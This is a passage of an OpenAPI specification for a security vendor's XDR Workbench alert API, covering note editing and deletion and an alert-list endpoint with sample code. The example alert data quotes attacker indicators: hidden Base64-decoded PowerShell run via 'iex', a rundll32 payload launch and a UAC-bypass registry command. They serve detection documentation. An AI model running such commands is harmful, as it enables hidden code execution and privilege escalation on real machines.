{\n            e.printStackTrace();\n        }\n    }\n}\n"
          }
        ]
      },
      "patch": {
        "summary": "Edit alert note",
        "description": "Modifies the content of the specified Workbench alert note\n\n<div class=\"notice-permission\">\n  <b>API key role permissions required:</b><br>\n    <b>Workbench</b><br>\n  <ul>\n    <li>Modify alert details</li>\n  </ul>\n\n</div>\n",
        "tags": [
          "Workbench notes"
        ],
        "parameters": [
          {
            "name": "alertId",
            "description": "Unique alphanumeric string that identifies a Workbench alert.",
            "in": "path",
            "required": true,
            "schema": {
              "type": "string"
            },
            "example": "WB-14-20190709-00003"
          },
          {
            "name": "id",
            "description": "Numeric string that identifies a Workbench alert note.",
            "in": "path",
            "required": true,
            "schema": {
              "type": "integer"
            },
            "example": 1
          },
          {
            "name": "If-Match",
            "description": "Parameter that allows you to specify the version of the resource to be updated.",
            "in": "header",
            "schema": {
              "type": "string"
            },
            "example": "\"33a64df551425fcc55e4d42a148795d9f25f89d4\""
          }
        ],
        "requestBody": {
          "required": true,
          "content": {
            "application/json": {
              "schema": {
                "type": "object",
                "required": [
                  "content"
                ],
                "properties": {
                  "content": {
                    "type": "string",
                    "maxLength": 500000
                  }
                }
              }
            }
          }
        },
        "responses": {
          "204": {
            "description": "No content for this request"
          },
          "400": {
            "description": "Bad Request",
            "content": {
              "application/json": {
                "schema": {
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090003 - Unable to process the request. Verify that the request is properly formatted and try again. (Error code: 3090003)\n",
                      "properties": {
                        "code": {
                          "type": "string",
                          "example": "BadRequest",
                          "enum": [
                            "BadRequest"
                          ]
                        },
                        "message": {
                          "type": "string",
                          "example": "Unable to process the request. Verify that the request is properly formatted and try again. (Error code: 3090003)"
                        },
                        "number": {
                          "type": "integer",
                          "example": 3090003,
                          "enum": [
                            3090003
                          ]
                        }
                      },
                      "required": [
                        "code",
                        "message"
                      ]
                    }
                  },
                  "required": [
                    "error"
                  ]
                }
              }
            }
          },
          "404": {
            "description": "Not Found",
            "content": {
              "application/json": {
                "schema": {
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090007 - Unable to process the request. Verify that the specified workbench ID exists and that you have permission to access the alert and try again. (Error code: 3090007)\n* 3090008 - Unable to process the request. Verify that the request parameters are valid and try again. (Error code: 3090008)\n* 3090015 - False Positive Removed. Trend Micro has identified the alert as a false positive and removed it from Workbench. Please ignore the alert and proceed to other alerts (Error code: 3090015)\n",
                      "properties": {
                        "code": {
                          "type": "string",
                          "example": "NotFound",
                          "enum": [
                            "NotFound"
                          ]
                        },
                        "message": {
                          "type": "string",
                          "example": "Unable to process the request. Verify that the specified workbench ID exists and that you have permission to access the alert and try again. (Error code: 3090007)"
                        },
                        "number": {
                          "type": "integer",
                          "example": 3090007,
                          "enum": [
                            3090007,
                            3090008,
                            3090015
                          ]
                        }
                      },
                      "required": [
                        "code",
                        "message"
                      ]
                    }
                  },
                  "required": [
                    "error"
                  ]
                }
              }
            }
          },
          "412": {
            "description": "Condition Not Met",
            "content": {
              "application/json": {
                "schema": {
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090018 - The target resource is not updated because of ETag unmatching. (Error code: 3090018)\n",
                      "properties": {
                        "code": {
                          "type": "string",
                          "example": "ConditionNotMet",
                          "enum": [
                            "ConditionNotMet"
                          ]
                        },
                        "message": {
                          "type": "string",
                          "example": "The target resource is not updated because of ETag unmatching. (Error code: 3090018)"
                        },
                        "number": {
                          "type": "integer",
                          "example": 3090018,
                          "enum": [
                            3090018
                          ]
                        }
                      },
                      "required": [
                        "code",
                        "message"
                      ]
                    }
                  },
                  "required": [
                    "error"
                  ]
                }
              }
            }
          },
          "500": {
            "description": "Internal Server Error",
            "content": {
              "application/json": {
                "schema": {
                  "required": [
                    "error"
                  ],
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090999: An internal error has occurred. Please try again later. If the issue persists, contact your support provider. (Error code: 3090999)\n",
                      "required": [
                        "code",
                        "message"
                      ],
                      "properties": {
                        "code": {
                          "type": "string",
                          "enum": [
                            "InternalServerError"
                          ],
                          "example": "InternalServerError"
                        },
                        "message": {
                          "type": "string",
                          "example": "An internal error has occurred. Please try again later. If the issue persists, contact your support provider. (Error code: 3090999)"
                        },
                        "number": {
                          "type": "integer",
                          "enum": [
                            3090999
                          ],
                          "example": 3090999
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        },
        "x-code-samples": [
          {
            "lang": "Python",
            "source": "import requests\nimport json\n\nurl_base = 'https://api.xdr.trendmicro.com'\nurl_path = '/v3.0/workbench/alerts/{alertId}/notes/{id}'\nurl_path = url_path.format(**{'alertId': 'YOUR_ALERTID', 'id': 'YOUR_ID'})\ntoken = 'YOUR_TOKEN'\n\nquery_params = {}\nheaders = {\n    'Authorization': 'Bearer ' + token,\n    'Content-Type': 'application/json;charset=utf-8',\n    'If-Match': 'YOUR_IF-MATCH (string)'\n}\nbody = {\n    'content': 'YOUR_CONTENT (string)'\n}\n\nr = requests.patch(url_base + url_path, params=query_params, headers=headers, json=body)\n\nprint(r.status_code)\nfor k, v in r.headers.items():\n    print(f'{k}: {v}')\nprint('')\nif 'application/json' in r.headers.get('Content-Type', '') and len(r.content):\n    print(json.dumps(r.json(), indent=4))\nelse:\n    print(r.text)"
          },
          {
            "lang": "Java",
            "source": "import java.io.IOException;\nimport com.fasterxml.jackson.databind.JsonNode;\nimport com.fasterxml.jackson.databind.ObjectMapper;\nimport org.apache.hc.client5.http.ClientProtocolException;\nimport org.apache.hc.client5.http.impl.classic.CloseableHttpClient;\nimport org.apache.hc.client5.http.impl.classic.HttpClients;\nimport org.apache.hc.core5.http.ClassicHttpRequest;\nimport org.apache.hc.core5.http.ContentType;\nimport org.apache.hc.core5.http.Header;\nimport org.apache.hc.core5.http.HttpEntity;\nimport org.apache.hc.core5.http.HttpHeaders;\nimport org.apache.hc.core5.http.io.entity.EntityUtils;\nimport org.apache.hc.core5.http.io.support.ClassicRequestBuilder;\n\npublic class ApiSample {\n\n    public static void main(String[] args) {\n        String urlBase = \"https://api.xdr.trendmicro.com\";\n        String urlPath = \"/v3.0/workbench/alerts/{alertId}/notes/{id}\";\n        urlPath = urlPath.replace(\"{alertId}\", \"YOUR_ALERTID\");\n        urlPath = urlPath.replace(\"{id}\", \"YOUR_ID\");\n        String token = \"YOUR_TOKEN\";\n\n        String requestyBody = \n                \"{\" +\n                \"    \\\"content\\\": \\\"YOUR_CONTENT (string)\\\"\" +\n                \"}\";\n\n        ClassicHttpRequest request = ClassicRequestBuilder.patch(urlBase + urlPath)\n                .addHeader(HttpHeaders.AUTHORIZATION, \"Bearer \" + token)\n                .addHeader(\"Content-Type\", \"application/json;charset=utf-8\")\n                .addHeader(\"If-Match\", \"YOUR_IF-MATCH (string)\")\n                .setEntity(requestyBody, ContentType.APPLICATION_JSON)\n                .build();\n\n        try (CloseableHttpClient httpClient = HttpClients.custom().disableContentCompression().build()) {\n            httpClient.execute(request, response -> {\n                HttpEntity entity = response.getEntity();\n                String contentType = (entity == null) ? \"\" : entity.getContentType();\n                long contentLength = (entity == null) ? 0 : entity.getContentLength();\n                boolean isChunked = (entity == null) ? false : entity.isChunked();\n\n                System.out.println(response.getCode());\n                for (Header header: response.getHeaders()) {\n                    System.out.println(header.getName() + \": \" + header.getValue());\n                }\n                System.out.println();\n                if (0 < contentLength || isChunked) {\n                    if (contentType.contains(\"application/json\")) {\n                        ObjectMapper mapper = new ObjectMapper();\n                        JsonNode jsonResponse = mapper.readTree(EntityUtils.toString(entity, \"UTF-8\"));\n                        System.out.println(mapper.writerWithDefaultPrettyPrinter().writeValueAsString(jsonResponse));\n                    } else {\n                        System.out.println(EntityUtils.toString(entity, \"UTF-8\"));\n                    }\n                }\n                return null;\n            });\n        } catch (ClientProtocolException e) {\n            e.printStackTrace();\n        } catch (IOException e) {\n            e.printStackTrace();\n        }\n    }\n}\n"
          }
        ]
      }
    },
    "/v3.0/workbench/alerts/{alertId}/notes/delete": {
      "post": {
        "summary": "Delete alert notes",
        "description": "Deletes the specified notes from a Workbench alert.\n\n<div class=\"notice-permission\">\n  <b>API key role permissions required:</b><br>\n    <b>Workbench</b><br>\n  <ul>\n    <li>Modify alert details</li>\n  </ul>\n\n</div>\n",
        "tags": [
          "Workbench notes"
        ],
        "parameters": [
          {
            "name": "alertId",
            "description": "Unique alphanumeric string that identifies a Workbench alert.",
            "in": "path",
            "required": true,
            "schema": {
              "type": "string"
            },
            "example": "WB-14-20190709-00003"
          }
        ],
        "requestBody": {
          "required": true,
          "content": {
            "application/json": {
              "schema": {
                "type": "array",
                "items": {
                  "type": "object",
                  "required": [
                    "id"
                  ],
                  "properties": {
                    "id": {
                      "type": "integer",
                      "description": "Numeric string that identifies a Workbench alert note"
                    }
                  }
                },
                "example": [
                  {
                    "id": 0
                  },
                  {
                    "id": 1
                  }
                ]
              }
            }
          }
        },
        "responses": {
          "204": {
            "description": "No content"
          },
          "400": {
            "description": "Bad request",
            "content": {
              "application/json": {
                "schema": {
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090003 - Unable to process the request. Verify that the request is properly formatted and try again. (Error code: 3090003)\n",
                      "properties": {
                        "code": {
                          "type": "string",
                          "example": "BadRequest",
                          "enum": [
                            "BadRequest"
                          ]
                        },
                        "message": {
                          "type": "string",
                          "example": "Unable to process the request. Verify that the request is properly formatted and try again. (Error code: 3090003)"
                        },
                        "number": {
                          "type": "integer",
                          "example": 3090003,
                          "enum": [
                            3090003
                          ]
                        }
                      },
                      "required": [
                        "code",
                        "message"
                      ]
                    }
                  },
                  "required": [
                    "error"
                  ]
                }
              }
            }
          },
          "404": {
            "description": "Not found",
            "content": {
              "application/json": {
                "schema": {
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090007 - Unable to process the request. Verify that the specified workbench ID exists and that you have permission to access the alert and try again. (Error code: 3090007)\n* 3090008 - Unable to process the request. Verify that the request parameters are valid and try again. (Error code: 3090008)\n* 3090015 - False Positive Removed. Trend Micro has identified the alert as a false positive and removed it from Workbench. Please ignore the alert and proceed to other alerts (Error code: 3090015)\n",
                      "properties": {
                        "code": {
                          "type": "string",
                          "example": "NotFound",
                          "enum": [
                            "NotFound"
                          ]
                        },
                        "message": {
                          "type": "string",
                          "example": "Unable to process the request. Verify that the specified workbench ID exists and that you have permission to access the alert and try again. (Error code: 3090007)"
                        },
                        "number": {
                          "type": "integer",
                          "example": 3090007,
                          "enum": [
                            3090007,
                            3090008,
                            3090015
                          ]
                        }
                      },
                      "required": [
                        "code",
                        "message"
                      ]
                    }
                  },
                  "required": [
                    "error"
                  ]
                }
              }
            }
          },
          "500": {
            "description": "Internal server error",
            "content": {
              "application/json": {
                "schema": {
                  "required": [
                    "error"
                  ],
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090998: Unable to delete the specified objects. An internal error has occurred. Please try again later. If the issue persists, contact your support provider. (Error code: 3090998)\n* 3090999: An internal error has occurred. Please try again later. If the issue persists, contact your support provider. (Error code: 3090999)\n",
                      "required": [
                        "code",
                        "message"
                      ],
                      "properties": {
                        "code": {
                          "type": "string",
                          "enum": [
                            "InternalServerError"
                          ],
                          "example": "InternalServerError"
                        },
                        "message": {
                          "type": "string",
                          "example": "An internal error has occurred. Please try again later. If the issue persists, contact your support provider. (Error code: 3090999)"
                        },
                        "number": {
                          "type": "integer",
                          "enum": [
                            3090998,
                            3090999
                          ],
                          "example": 3090999
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        },
        "x-code-samples": [
          {
            "lang": "Python",
            "source": "import requests\nimport json\n\nurl_base = 'https://api.xdr.trendmicro.com'\nurl_path = '/v3.0/workbench/alerts/{alertId}/notes/delete'\nurl_path = url_path.format(**{'alertId': 'YOUR_ALERTID'})\ntoken = 'YOUR_TOKEN'\n\nquery_params = {}\nheaders = {\n    'Authorization': 'Bearer ' + token,\n    'Content-Type': 'application/json;charset=utf-8'\n}\nbody = [\n    {\n        'id': 'YOUR_ID (integer)'\n    }\n]\n\nr = requests.post(url_base + url_path, params=query_params, headers=headers, json=body)\n\nprint(r.status_code)\nfor k, v in r.headers.items():\n    print(f'{k}: {v}')\nprint('')\nif 'application/json' in r.headers.get('Content-Type', '') and len(r.content):\n    print(json.dumps(r.json(), indent=4))\nelse:\n    print(r.text)"
          },
          {
            "lang": "Java",
            "source": "import java.io.IOException;\nimport com.fasterxml.jackson.databind.JsonNode;\nimport com.fasterxml.jackson.databind.ObjectMapper;\nimport org.apache.hc.client5.http.ClientProtocolException;\nimport org.apache.hc.client5.http.impl.classic.CloseableHttpClient;\nimport org.apache.hc.client5.http.impl.classic.HttpClients;\nimport org.apache.hc.core5.http.ClassicHttpRequest;\nimport org.apache.hc.core5.http.ContentType;\nimport org.apache.hc.core5.http.Header;\nimport org.apache.hc.core5.http.HttpEntity;\nimport org.apache.hc.core5.http.HttpHeaders;\nimport org.apache.hc.core5.http.io.entity.EntityUtils;\nimport org.apache.hc.core5.http.io.support.ClassicRequestBuilder;\n\npublic class ApiSample {\n\n    public static void main(String[] args) {\n        String urlBase = \"https://api.xdr.trendmicro.com\";\n        String urlPath = \"/v3.0/workbench/alerts/{alertId}/notes/delete\";\n        urlPath = urlPath.replace(\"{alertId}\", \"YOUR_ALERTID\");\n        String token = \"YOUR_TOKEN\";\n\n        String requestyBody = \n                \"[\" +\n                \"    {\" +\n                \"        \\\"id\\\": \\\"YOUR_ID (integer)\\\"\" +\n                \"    }\" +\n                \"]\";\n\n        ClassicHttpRequest request = ClassicRequestBuilder.post(urlBase + urlPath)\n                .addHeader(HttpHeaders.AUTHORIZATION, \"Bearer \" + token)\n                .addHeader(\"Content-Type\", \"application/json;charset=utf-8\")\n                .setEntity(requestyBody, ContentType.APPLICATION_JSON)\n                .build();\n\n        try (CloseableHttpClient httpClient = HttpClients.custom().disableContentCompression().build()) {\n            httpClient.execute(request, response -> {\n                HttpEntity entity = response.getEntity();\n                String contentType = (entity == null) ? \"\" : entity.getContentType();\n                long contentLength = (entity == null) ? 0 : entity.getContentLength();\n                boolean isChunked = (entity == null) ? false : entity.isChunked();\n\n                System.out.println(response.getCode());\n                for (Header header: response.getHeaders()) {\n                    System.out.println(header.getName() + \": \" + header.getValue());\n                }\n                System.out.println();\n                if (0 < contentLength || isChunked) {\n                    if (contentType.contains(\"application/json\")) {\n                        ObjectMapper mapper = new ObjectMapper();\n                        JsonNode jsonResponse = mapper.readTree(EntityUtils.toString(entity, \"UTF-8\"));\n                        System.out.println(mapper.writerWithDefaultPrettyPrinter().writeValueAsString(jsonResponse));\n                    } else {\n                        System.out.println(EntityUtils.toString(entity, \"UTF-8\"));\n                    }\n                }\n                return null;\n            });\n        } catch (ClientProtocolException e) {\n            e.printStackTrace();\n        } catch (IOException e) {\n            e.printStackTrace();\n        }\n    }\n}\n"
          }
        ]
      }
    },
    "/v3.0/workbench/alerts": {
      "get": {
        "summary": "Get alerts list",
        "description": "Displays information about workbench alerts that match the specified criteria in a paginated list.\n\nNote: This method displays up to 10 entries per page. If the response body exceeds 50 MB in size, the method displays only one entry per page.\n\n\n<div class=\"notice-permission\">\n  <b>API key role permissions required:</b><br>\n    <b>Workbench</b><br>\n  <ul>\n    <li>View, filter, and search</li>\n  </ul>\n\n</div>\n",
        "tags": [
          "Workbench"
        ],
        "parameters": [
          {
            "name": "TMV1-Filter",
            "description": "Filter for retrieving a subset of the alert list.\n\nSupported fields:\n|Field    |Description |Possible values|\n|---------|------------|--------------|\n|id |The unique identifier of an alert |Any value|\n|investigationStatus **(Deprecated)** |The current status of the Workbench alert or investigation |`New`, `In Progress`, `True Positive`, `False Positive`, `Benign True Positive`, `Closed`|\n|status |The status of the case or investigation |`Open`, `In Progress`, `Closed`|\n|investigationResult |The findings of the case or investigation |`No Findings`, `Noteworthy`, `True Positive`, `False Positive`, `Benign True Positive`, `Other Findings`|\n|alertProvider |Source of a Workbench alert |`SAE`, `TI`|\n|modelId |ID of the detection model that triggered the alert |Any value|\n|model |The detection model that triggered the alert |Any value|\n|modelType |The type of detection model that triggered the alert |`preset`, `custom`|\n|severity |The severity assigned to a model that triggered the alert |`critical`, `high`, `medium`, `low`|\n|impactScopeEntityValue |Entities affected within the company network |Any value|\n|indicatorValue |Objects found using root cause analysis or sweeping |Any value|\n|incidentId |The unique identifier of an incident |Any value|\n\nSupported operators:\n|Operator |Description |\n|---------|------------|\n|`eq`|Operator 'equal to'|\n|`and`|Operator 'and'|\n|`or`|Operator 'or'|\n|`not`|Operator 'not'|\n|`( )`|Symbols for grouping operands with their correct operator.|\n|`contains`|Operator that allows you to search for a specified string in a field|\n\nNote: Include this parameter in every request that generates paginated output.\n",
            "in": "header",
            "schema": {
              "type": "string",
              "maxLength": 5000
            },
            "examples": {
              "multiCondition": {
                "value": "investigationStatus eq 'New' and contains(impactScopeEntityValue,'nimda')",
                "summary": "Filters the list by alert status (exact match) and impacted entity (partial match)."
              },
              "impactScopeEntityValue": {
                "value": "impactScopeEntityValue eq 'nimda'",
                "summary": "Filters the list by impacted entity (exact match)"
              },
              "indicatorValue": {
                "value": "indicatorValue eq '8.8.8.8'",
                "summary": "Filters the list by detected indicator (exact match)"
              }
            }
          },
          {
            "name": "startDateTime",
            "description": "Datetime in ISO 8601 format (yyyy-MM-ddThh:mm:ssZ in UTC) that indicates the start of the data retrieval time range. The available oldest value is \"1970-01-01T00:00:00Z\"",
            "in": "query",
            "schema": {
              "type": "string",
              "format": "date-time"
            },
            "example": "2020-06-15T10:00:00Z",
            "default": "1970-01-01T00:00:00Z"
          },
          {
            "name": "endDateTime",
            "description": "Datetime in ISO 8601 format (yyyy-MM-ddThh:mm:ssZ in UTC) that indicates the end of the data retrieval time range. Ensure that \"endDateTime\" is not earlier than \"startDateTime\".",
            "in": "query",
            "schema": {
              "type": "string",
              "format": "date-time"
            },
            "example": "2020-06-15T12:00:00Z",
            "default": "Current date time"
          },
          {
            "name": "dateTimeTarget",
            "description": "The timestamp to be used for retrieving Workbench alert data.",
            "in": "query",
            "schema": {
              "type": "string",
              "enum": [
                "createdDateTime",
                "updatedDateTime",
                "firstInvestigatedDateTime"
              ],
              "default": "createdDateTime"
            }
          },
          {
            "name": "orderBy",
            "description": "Specifies the field by which the results are sorted. \n\nRecords are returned in descending order by default. To return records in ascending order, add the phrase `asc` after the parameter name.\n\nYou can specify multiple fields separated by commas.\n\nAvailable values:\n* id\n* caseId\n* name\n* investigationStatus (deprecated)\n* status\n* investigationResult\n* modelId\n* model\n* score\n* severity\n* createdDateTime\n* updatedDateTime\n* firstInvestigatedDateTime\n",
            "in": "query",
            "schema": {
              "type": "string",
              "default": "createdDateTime desc",
              "maxLength": 200
            },
            "example": "score desc,severity desc"
          }
        ],
        "responses": {
          "200": {
            "description": "OK",
            "content": {
              "application/json": {
                "schema": {
                  "type": "object",
                  "required": [
                    "totalCount",
                    "count",
                    "items"
                  ],
                  "properties": {
                    "totalCount": {
                      "type": "integer",
                      "description": "Number of Workbench alerts retrieved",
                      "example": 100
                    },
                    "count": {
                      "type": "integer",
                      "description": "Number of workbench alerts displayed on the viewed page.",
                      "example": 10
                    },
                    "items": {
                      "type": "array",
                      "items": {
                        "$ref": "#/components/schemas/awb-workbenchAlertV3"
                      }
                    },
                    "nextLink": {
                      "type": "string",
                      "description": "Link to retrieve the next page of entries in paginated output.",
                      "example": "https://api.xdr.trendmicro.com/v3.0/workbench/alerts?skipToken=MTA=&orderBy=score%20desc"
                    }
                  },
                  "example": {
                    "totalCount": 2,
                    "count": 2,
                    "items": [
                      {
                        "schemaVersion": "1.12",
                        "id": "WB-9002-20220906-00022",
                        "investigationStatus": "New",
                        "status": "Open",
                        "investigationResult": "No Findings",
                        "workbenchLink": "https://THE_WORKBENCH_URL",
                        "alertProvider": "SAE",
                        "modelId": "1ebd4f91-4b28-40b4-87f5-8defee4791d8",
                        "model": "Privilege Escalation via UAC Bypass",
                        "modelType": "preset",
                        "score": 64,
                        "severity": "high",
                        "firstInvestigatedDateTime": "2022-10-06T02:30:31Z",
                        "createdDateTime": "2022-09-06T02:49:31Z",
                        "updatedDateTime": "2022-09-06T02:49:48Z",
                        "incidentId": "IC-1-20230706-00001",
                        "caseId": "CL-1-20230706-00001",
                        "ownerIds": [
                          "12345678-1234-1234-1234-123456789012"
                        ],
                        "impactScope": {
                          "desktopCount": 1,
                          "serverCount": 0,
                          "accountCount": 1,
                          "emailAddressCount": 1,
                          "containerCount": 1,
                          "cloudIdentityCount": 1,
                          "entities": [
                            {
                              "entityType": "account",
                              "entityValue": "shockwave\\sam",
                              "entityId": "shockwave\\sam",
                              "relatedEntities": [
                                "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                              ],
                              "relatedIndicatorIds": [],
                              "provenance": [
                                "Alert"
                              ]
                            },
                            {
                              "entityType": "host",
                              "entityValue": {
                                "guid": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E",
                                "name": "nimda",
                                "ips": [
                                  "10.10.58.51"
                                ]
                              },
                              "entityId": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E",
                              "managementScopeGroupId": "deadbeef-292e-42ae-86be-d2fef483a248",
                              "managementScopeInstanceId": "1babc299-52de-44f4-a1d2-8a224f391eee",
                              "managementScopePartitionKey": "4c1850c0-8a2a-4637-9f88-6afbab54dd79",
                              "relatedEntities": [
                                "shockwave\\sam"
                              ],
                              "relatedIndicatorIds": [
                                1,
                                2,
                                3,
                                4,
                                5,
                                6,
                                7,
                                8
                              ],
                              "provenance": [
                                "Alert"
                              ]
                            },
                            {
                              "entityType": "emailAddress",
                              "entityValue": "support@pctutordetroit.com",
                              "entityId": "SUPPORT@PCTUTORDETROIT.COM",
                              "relatedEntities": [],
                              "relatedIndicatorIds": [],
                              "provenance": [
                                "Alert"
                              ]
                            },
                            {
                              "entityType": "container",
                              "entityValue": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0",
                              "entityId": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496",
                              "relatedEntities": [],
                              "relatedIndicatorIds": [],
                              "provenance": [
                                "Alert"
                              ]
                            },
                            {
                              "entityType": "cloudIdentity",
                              "entityValue": "arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung",
                              "entityId": "arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung",
                              "relatedEntities": [],
                              "relatedIndicatorIds": [],
                              "provenance": [
                                "Alert"
                              ]
                            }
                          ]
                        },
                        "description": "A user bypassed User Account Control (UAC) to gain higher-level permissions.",
                        "matchedRules": [
                          {
                            "id": "25d96e5d-cb69-4935-ae27-43cc0cdca1cc",
                            "name": "(T1088) Bypass UAC via shell open registry",
                            "matchedFilters": [
                              {
                                "id": "ac200e74-8309-463e-ad6b-a4c16a3a377f",
                                "name": "Bypass UAC Via Shell Open Default Registry",
                                "matchedDateTime": "2022-09-05T03:53:49.802Z",
                                "mitreTechniqueIds": [
                                  "T1112",
                                  "V9.T1112",
                                  "V9.T1548.002"
                                ],
                                "matchedEvents": [
                                  {
                                    "uuid": "a32599b7-c0c9-45ed-97bf-f2be7679fb00",
                                    "matchedDateTime": "2022-09-05T03:53:49.802Z",
                                    "type": "TELEMETRY_REGISTRY"
                                  }
                                ]
                              },
                              {
                                "id": "857b6396-da29-44a8-bc11-25298e646795",
                                "name": "Bypass UAC Via Shell Open Registry",
                                "matchedDateTime": "2022-09-05T03:53:49.802Z",
                                "mitreTechniqueIds": [
                                  "T1112",
                                  "T1088",
                                  "V9.T1112",
                                  "V9.T1548.002"
                                ],
                                "matchedEvents": [
                                  {
                                    "uuid": "4c456bbb-2dfc-40a5-b298-799a0ccefc01",
                                    "matchedDateTime": "2022-09-05T03:53:49.802Z",
                                    "type": "TELEMETRY_REGISTRY"
                                  }
                                ]
                              }
                            ]
                          }
                        ],
                        "indicators": [
                          {
                            "id": 1,
                            "type": "command_line",
                            "field": "processCmd",
                            "value": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint",
                            "relatedEntities": [
                              "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                            ],
                            "filterIds": [
                              "ac200e74-8309-463e-ad6b-a4c16a3a377f"
                            ],
                            "provenance": [
                              "Alert"
                            ]
                          },
                          {
                            "id": 2,
                            "type": "command_line",
                            "field": "parentCmd",
                            "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r;  ",
                            "relatedEntities": [
                              "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                            ],
                            "filterIds": [
                              "ac200e74-8309-463e-ad6b-a4c16a3a377f"
                            ],
                            "provenance": [
                              "Alert"
                            ]
                          },
                          {
                            "id": 3,
                            "type": "command_line",
                            "field": "processCmd",
                            "value": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint",
                            "relatedEntities": [
                              "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                            ],
                            "filterIds": [
                              "857b6396-da29-44a8-bc11-25298e646795"
                            ],
                            "provenance": [
                              "Alert"
                            ]
                          },
                          {
                            "id": 4,
                            "type": "command_line",
                            "field": "parentCmd",
                            "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r;  ",
                            "relatedEntities": [
                              "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                            ],
                            "filterIds": [
                              "857b6396-da29-44a8-bc11-25298e646795"
                            ],
                            "provenance": [
                              "Alert"
                            ]
                          },
                          {
                            "id": 5,
                            "type": "registry_key",
                            "field": "objectRegistryKeyHandle",
                            "value": "hkcr\\ms-settings\\shell\\open\\command",
                            "relatedEntities": [
                              "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                            ],
                            "filterIds": [
                              "ac200e74-8309-463e-ad6b-a4c16a3a377f"
                            ],
                            "provenance": [
                              "Alert"
                            ]
                          },
                          {
                            "id": 6,
                            "type": "registry_key",
                            "field": "objectRegistryKeyHandle",
                            "value": "hkcr\\ms-settings\\shell\\open\\command",
                            "relatedEntities": [
                              "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                            ],
                            "filterIds": [
                              "857b6396-da29-44a8-bc11-25298e646795"
                            ],
                            "provenance": [
                              "Alert"
                            ]
                          },
                          {
                            "id": 7,
                            "type": "registry_value",
                            "field": "objectRegistryValue",
                            "value": "delegateexecute",
                            "relatedEntities": [
                              "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                            ],
                            "filterIds": [
                              "857b6396-da29-44a8-bc11-25298e646795"
                            ],
                            "provenance": [
                              "Alert"
                            ]
                          },
                          {
                            "id": 8,
                            "type": "registry_value_data",
                            "field": "objectRegistryData",
                            "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x",
                            "relatedEntities": [
                              "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                            ],
                            "filterIds": [
                              "ac200e74-8309-463e-ad6b-a4c16a3a377f"
                            ],
                            "provenance": [
                              "Alert"
                            ]
                          }
                        ]
                      },
                      {
                        "schemaVersion": "1.12",
                        "id": "WB-9002-20220906-00023",
                        "investigationStatus": "New",
                        "status": "Open",
                        "investigationResult": "No Findings",
                        "workbenchLink": "https://THE_WORKBENCH_URL",
                        "alertProvider": "SAE",
                        "modelId": "1ebd4f91-4b28-40b4-87f5-8defee4791d8",
                        "model": "Credential Dumping via Mimikatz",
                        "modelType": "preset",
                        "score": 64,
                        "severity": "high",
                        "createdDateTime": "2022-09-06T02:49:30Z",
                        "updatedDateTime": "2022-09-06T02:49:50Z",
                        "impactScope": {
                          "desktopCount": 1,
                          "serverCount": 0,
                          "accountCount": 1,
                          "emailAddressCount": 0,
                          "containerCount": 0,
                          "cloudIdentityCount": 0,
                          "entities": [
                            {
                              "entityType": "account",
                              "entityValue": "shockwave\\sam",
                              "entityId": "shockwave\\sam",
                              "relatedEntities": [
                                "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                              ],
                              "relatedIndicatorIds": [],
                              "provenance": [
                                "Alert"
                              ]
                            },
                            {
                              "entityType": "host",
                              "entityValue": {
                                "guid": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E",
                                "name": "nimda",
                                "ips": [
                                  "10.10.58.51"
                                ]
                              },
                              "entityId": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E",
                              "managementScopeGroupId": "deadbeef-292e-42ae-86be-d2fef483a248",
                              "managementScopeInstanceId": "1babc299-52de-44f4-a1d2-8a224f391eee",
                              "managementScopePartitionKey": "4c1850c0-8a2a-4637-9f88-6afbab54dd79",
                              "relatedEntities": [
                                "shockwave\\sam"
                              ],
                              "relatedIndicatorIds": [
                                1,
                                2,
                                3,
                                4,
                                5,
                                6,
                                7
                              ],
                              "provenance": [
                                "Alert"
                              ]
                            }
                          ]
                        },
                        "description": "A user obtained account logon information that can be used to access remote systems via Mimikatz.",
                        "matchedRules": [
                          {
                            "id": "1288958d-3062-4a75-91fc-51b2a49bc7d7",
                            "name": "Potential Credential Dumping via Mimikatz",
                            "matchedFilters": [
                              {
                                "id": "49d327c4-361f-43f0-b66c-cab433495e42",
                                "name": "Possible Credential Dumping via Mimikatz",
                                "matchedDateTime": "2022-09-05T03:53:57.199Z",
                                "mitreTechniqueIds": [
